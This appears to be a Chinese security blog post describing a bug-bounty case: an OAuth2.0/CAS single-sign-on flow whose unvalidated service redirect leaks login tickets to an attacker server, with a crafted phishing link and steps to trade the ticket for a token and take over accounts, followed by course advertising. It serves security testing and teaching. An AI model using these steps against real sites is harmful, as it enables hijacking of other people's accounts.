OAuth2.0劫持账号漏洞挖掘案例
前言
SSO和OAuth2.0大家都不陌生了,SSO简单说是一种概念,将登录认证和业务系统分离,而OAuth则是常用的授权框架,像微信、qq第三方登录,很多文章也都写了,这里就不叙述了,下面的案例则是用OAuth2.0来实现SSO单点登录的场景
漏洞挖掘过程
登录受害者账号,下面有很多子系统,随便点击一个,抓包看看流程

关键的有几个数据包,第一个数据包重定向的页面中携带了ticket

浏览器访问是这样的

第二个数据包如下,请求授权服务来获取access_token,这就是典型OAuth中的的授权码模式,上面的ticket就是授权码code

第三个数据包如下,带着这个token直接访问目标系统

我们将第一个get请求包参数修改为baidu测试看看是否做了限制,发现会直接跳到百度,没有做任何限制,这就代表攻击者访问自己的服务器就会把这个ticket带出,我们劫持到这个就可以劫持受害者账号

本地启动一个http服务演示,实际可使用dnslog或者自己服务器

将此链接发送给受害者,受害者点击即可盗取受害者的ticket
https://xx.xx.com/cas-server/login?service=http%3A%2F%2F127.0.0.1:8000

接受到ticket

直接把第二个数据包中的code替换,获取生成的access_token

直接将第三个数据包中的token替换访问即可接管账号

其它一些常见测试思路
假如说请求的url做了白名单限制,我们就可以尝试配合子域名下的xss来定向到我们的服务器,同理利用url跳转也可以绕过
还可以利用csrf劫持账号,在OAuth2.0协议中是有state参数,是随机生成的一串字符串来进行防御,但是也有很多站点没有使用这个参数或者参数值不会改变就会导致csrf
还有就是像令牌复用、不过期等风险项,实际利用很难的话国内src基本上也不会收
总的来说就是要关注整个认证流程每一个数据包,分析每一步是干了什么,如果有携带了代表账号的id、username、手机号等相关信息就可以尝试进行修改,有些参数可能进行了编码就忽略掉了
网络安全学习资源分享:
给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
因篇幅有限,仅展示部分资料,朋友们如果有需要全套《网络安全入门+进阶学习资源包》,需要点击下方链接即可前往获取
读者福利 | CSDN大礼包:《网络安全入门&进阶学习资源包》免费分享 (安全链接,放心点击)
👉1.成长路线图&学习规划👈
要学习一门新的技术,作为新手一定要先学习成长路线图,方向不对,努力白费。
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图&学习规划。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。


👉2.网安入门到进阶视频教程👈
很多朋友都不喜欢晦涩的文字,我也为大家准备了视频教程,其中一共有21个章节,每个章节都是当前板块的精华浓缩。(全套教程文末领取哈)


👉3.SRC&黑客文档👈
大家最喜欢也是最关心的SRC技术文籍&黑客技术也有收录
SRC技术文籍:

黑客资料由于是敏感资源,这里不能直接展示哦!(全套教程文末领取哈)
👉4.护网行动资料👈
其中关于HW护网行动,也准备了对应的资料,这些内容可相当于比赛的金手指!

👉5.黑客必读书单👈

👉6.网络安全岗面试题合集👈
当你自学到这里,你就要开始思考找工作的事情了,而工作绕不开的就是真题和面试题。

所有资料共282G,朋友们如果有需要全套《网络安全入门+进阶学习资源包》,可以扫描下方二维码或链接免费领取~
读者福利 | CSDN大礼包:《网络安全入门&进阶学习资源包》免费分享 (安全链接,放心点击)
3527

被折叠的 条评论
为什么被折叠?



